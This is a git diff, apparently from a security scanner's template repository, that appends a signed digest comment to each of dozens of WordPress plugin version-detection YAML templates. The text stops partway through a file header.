a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100acbba6745234410dbee5eaee5a5a2f8d105ac11140755101c152a5ae7fa03d87022048fa18ff48c8161e800043292de88a5baa28d786c6ec57b7ac8148f51ad38224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255b..014f65c356b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100942647332dec665ce1cad04fae5018a5e7cd1d1ae7ffb3cd4999aed034121f3a0220672f76d88e7d818cbf3d1c48d985e129620ec5a87fcf754d0c61cbfdde6fa20e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d00..1440a7bd314 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028151623d26dd2087cc176ea35a2e78b3bb3481b29676d704b69d18c80dc750b022100dc4fe08fe5f348cbfda4a00ea465e25600e2c84cde4e4e58f3367daa60b98799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed51..a19bea3922c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220045b677df2c50d796ebe7d52e6c87ec28b1c2a24d18c7777135b3089d30e62ae02203a7bb294762496657a35cade8b3d767587787cd0b69591c510b6a35777d53a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b1..b87ed2e106d 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e9284e9c5c52b492d1a155c6ffa3f53a06a66cd11624c4f8ac56af1fbeb757a7022042499ecde1cbc6f351b5a855954b80ea52a12e3e219816ecf368c2d4bf105b6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3e..f59c1bcfdf0 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd72b4d3fd17b7bc956ef00bad56f307aa97086e9e4bfd205347d4a25778a29b02206830a0608797f1c0164d0f51b84a58d94d94cbafb66bfac176ca9afc874ef838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec50..14b004ec1cb 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d2651f9ed1f051cf6297122d9a98dc3ac6abff6a5ef70dd53ad8f57d82dc7220221008f9a7700a9125e5071f07ab6c538ccdd7089912bc43c36a2f60911dc94e7bb28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a2203..3a2031249e7 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066c82cb7013ef4c411ce7df5f0d1aad8f6882305d2dbab8947add8ad8131e14a0220537ad570f16f3753087bf405d15d63d65e17b03beb015be0d781563c2115c111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453e..04e3b456387 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201ef42283b7950b9fc404d8647082b3cd2ff214f679150c5f0658590555c6f912022001b537e34ec0c9f975d0bc6eac0b2bcac439b54b451c48fe97eea00b0da254ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac08..f16fff505c2 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eeedf6062722ebf03aade7502fd31ac943f23d4c7b97af26e47473985ae2ae59022100a716963d0baf6d9238516c7abce7defac817c8e7b565caa54d84474824dad99f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca9..09c3628c808 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fcf223dd0c7432c7777781146450dffaa442a577ec72f3538f1c7cf17e55960d02201f7fef467cf6cde8f7591573aa3f4fda75d98cb36532e582463eab3671fcee5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82db..138b88ba715 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044021f5e77810af6ca6659f468362d7aa3197e941d65647146e9be8a097ee1475e0f022100865b729e99b1d2fd38d9a0b6cf40e9180e8e31f2881fe75db9b1ae30c7fa473c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201fc..af922e935d4 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201dd5a2b732a1fdea8b39bc80468b547721e56bc3f958979584908970d1ec557d0220730a4aba310ddd7fbdb468c3ea40e4dcccf9177ad4c646fc7805901485afd000:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d07..36c7ec7ee9f 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022000af9801b4942749a2f520e0a53702dab5cbd54ef9278408de6294d0ea7061930220788444e154ef18fb3cde86dbba56ee77f00fda7deee8a3f72fdf64b72aeabf61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78a..11eb35c2223 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220469e3d2ad6840b1421c796c959cc1c2d1b4e8a212ae900bc32a8964073cf72560221008804596b377e6bef26e974a8d8539cfe26922fe7bdfd2370c4acad87c508fd8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8eaf..c03ecb6dd00 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202dc5d4afae672a128cbda88b3a4ee96e75b747a53a23db92d18ce3b483619ac8022061aecc2f54bad61a081ff1816a2be6d0e054ee508b7539e304b8adb79ecbd93d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e1..1ad04130298 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022035fd6fcd223fcce59971a29d3874c0c2839d5c1c50c3d6a1307b05519d2441bc022100d65bfcab8152693b7d658f1a0f82da6f38e7a550f48341af0a1844fbaff3edde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389dc..111f762678f 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf8dc5d65f6442765aebc677d4600fde0320d1686767002ec1168a61ad3b9d7b02203dc7f353756675c2fd949fe665dad565659717c249c05d833f8d2d5716796b22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492c..8c559e59f8d 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204f55ffbcdc660dc8951f14d31b93253ab4d4538675510e5613ef0541d3532bee0220158853b309a84534f3d6436421565acc57c577e097d21b96a047b4f86eb66137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d1..f15ccc3f3fd 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204e1e3dcaf50245466425e4c845ddac23581843cd1bd6eb439faa6a5d12bf76bf02207f13f49728daa79a9f35b60d367308292b565aaf161d85cf5577f3c8afc3aa91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee79807..2d26ddaf4dd 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078abaf801558c98ed0244955b062b1bb18774b1d57264aa8e484cd60b588894402207a16854353066384e0f5459685186b34b3e4a9ee0fd7528e710c6e0759a7e8b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767b..58e6513fcf7 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d87e8ed9345a51008ad8ed1d640996236780573f28167ac1709575f855e38577022058518f9365306314df233dabccf03ef7dd7f2931d1505ecb11f17258d148f301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073ca..49a0aa2445e 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058d7a7b201d549d0561af6b80fa1de90169a7656e7fba54d509c16e8ae165cc6022100f75334cfdce62cc97cf12fe1b3e6dedd91c388a461871a58fcab10eec821f352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55f..764924ba48f 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100986dfef594e59e15c307c90646190d961e1541e307312ffd403b8a6da78a8f1802201a3d2af345547b0fbf05169bb5adb92d5cfb993861cdaaf46027ef709606a045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692e..5d594816fe0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210082f030dd764df33c926611a2e493b64e9c62c22e43830b8070c3cea4463c512e022100a4a824c1edb8307fc176cd750f89c47458eee92cec81321cd4aafb1d2ae3a1a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f3..3283b0d71f9 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009ed352d50e522b22191e7364fa7f48cbf3b68a4eb9cc0ef987a118c817e27ab6022100ff205e7aaa444e8a905bd44846e88ef76deccb6f83ea9b668427997da8c26097:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316c..044d03c37c7 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204062d0afd7c36d09f37d46efd46c7d3878e1edc11efc512e06fb75f7e9dbf08202201d0566dfc9b1b4e9737454f5a1fb49b2da4e013ebb86cfa7f73104f69e20e4e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff207791572..5efc2d7f06d 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210090b505663942eb741e73562223a471d1a4d5622fb1b7868907c67dacbd6de8f602204235fd52779f7db60a1ba12be100b2dd6b21a6ee453d1bdefb6aff9f83a4d986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017a..ae420ac7b96 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009caf7fbd9e2d9250c2ffa4088e35316eaa1050018c09f3f853fbb5a63f846a07022019695617a0b169daf28ed5af939da4119540c8f10bb0bcf7980b8fee39fa127a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d5..f49ecf399fc 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008648e7c81250d4724280337d47b12d8f0c0f666bd3a1be5c07bd07b5a088d45a022100d7a3a883a5fac8f03082186330c09b34b94d186145105d7dc13823be680b2a23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf56..921829f7a8e 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f4edbbb0e336ba35240678c235eede0c12d002c3ed77cb13ada3c48a1b395d65022100beea1f1ae792e300edf0788ea6541977c93dd5c9cd8081758ae6149486bf2965:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94b..d7f50bdfc06 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085b47572077e949b0f1582044be61871d31b0e594ab606ad7ff88d49cad1fa250221009c6c56dba2f07427f6f6c552cc4383ac245dba186569f2b0f2c7d428fa3e044a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709d..c9521ec3353 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206a725e5f93edcdacba57482b3989632a7e5d72e48aa1e71be9cc8b6a4cff979f02205b741305785178038bc2d5e179f1eb8632fc97c1731028f40cf8c6df725f6db9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c276825..207f8b5c3d6 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ea498b6d6c7be496691baff82369afe5172a69dfc05638a79cdb3673b6d2bfb002203e1c8ae1773dab868ec054d314cc25e0c84d2b0614e69da8d3cbf9ab14a0a024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b1..08f497c7530 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022074632153806f9c6b9dcad6e511f18e60725b7cce7492a743c9b62842fda931e902210096018222a596d8d16932517f4acc6f9610d8c54573b1232475eeb668c41c15f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a9..556907a7368 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100853871e70cf24ed27e73998d3b230e2f76fc84945b259419f39d859667a619c0022075d6eb6bf395ff65b5ef08cb2c16753abe11f7d6e89464ebaa6a133c30db0336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb856..d1356851660 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022007e3b9800b9003af33ef3547c4bc9d1b6c512632730a5e2e52338d0e2e155f5b02206db7b96deaa58716fcda370f99af7b2f3005ef87ce39e34565a03bd1501c114c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c63..f5bb94ceed4 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099ef1a7782cdac166a55cdf86a6379d7aede863af7e6f8f7df3697f2541ecd1b02201c39bfd9223ce26560807505234c58a412afb771c11c6b8ea43ec3f56c1988f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a342590..3c91fa85596 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201990c204a5e257b153fb899a047c63f70a521f55ad2e7c0809d610fa08dfaa1e022100fa37dec080f2f47027e5ac0d81fc5167ceba81d2006920082259f54389afcdde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a4..70f0af1421c 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c00afbea3517d80820b121de4b3384454fed4cbb16a2a377e229a2420f7310070220493bb476e8879571b13d11dba3f9cd8cd78362981b0529844e10bf1ff463a594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4be..54b0657f26b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220720eea89900bc0d8d35f95f4cbf5c96ff4ca24f016c9c4e835128de774c9b58b022032b6c137e38a5382b70bdec2f0b1f0c3bdf643c832c035d4d8e159d230351c19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed14..a9a3dcc543a 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e400785e8024f2c644cbb8df6e0dd0d1238c1eb5d684bf8885df30d4de53f5cb02202887e2412ee943eaaa6f712d8579620533532f26bd746b998e4fa36d8745bc9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274b..c0335fa5468 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200607f3ccab29f1b511aca3e2af3afb6d958877645f1f008fd3d9bd9d13e99bd502202a5610218ff18b6918562858f7811c60079aa1f45f0a7558ed68b4251396a9ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec66..ad35a1dcd96 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d87f479793e9edc959dced48eb91e8f1de03f40a2af77915c30efd507c6e0e80022054ecce2df3f18a906528e696056e1d4fcdbfe3351d813524be7c8cc7431218d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6c..e09fb66cbf8 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036067848fa950dbfb65c80c436081348d39437b6820430560bfe96c6b681ae6f022008001bc44a7e2609b3affcbb92679e5cdf138d99ce387815e2db2914594351a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35a..0f85d4607e7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098abf7a76ae40bfbdb521266da13ba82068ae9d3d6bb89f483cb051a1fadeffb022100bdcb83a6a3305f82f34c46796f42412e9ffefdd59a0bce18f120f035454a120a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4fa..1857c1fac7d 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eab4b629dd177b7021ccb0ba9a39d8916c25d7e93e77ff945a323e2a499bfcaf022100ac67c53a6fbd5e0b5eb0188ae0b7d0d40c68f24e8a02dbbcd154c3a7a627e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf72..0c6bd5b80cb 